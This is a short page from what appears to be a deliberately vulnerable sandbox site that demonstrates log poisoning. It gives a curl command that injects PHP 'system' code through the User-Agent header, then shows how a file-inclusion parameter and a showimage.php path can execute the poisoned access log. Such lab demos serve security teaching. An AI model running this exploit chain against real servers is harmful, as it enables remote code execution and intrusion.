Log Injection / Log Poisoning Demo
Request logged.
Log Poisoning Attack
1. Inject PHP code into User-Agent header:
curl -A "<?php system('id'); ?>" "http://localhost/logpoison.php"
2. Then include the log file via LFI:
curl "http://localhost/logpoison.php?include=1"
Or use the LFI in showimage.php to read the log file:
showimage.php?file=/home/novalbnp/sandbox.novalbnps.my.id/logs/access.log
Actions
Logs cleared.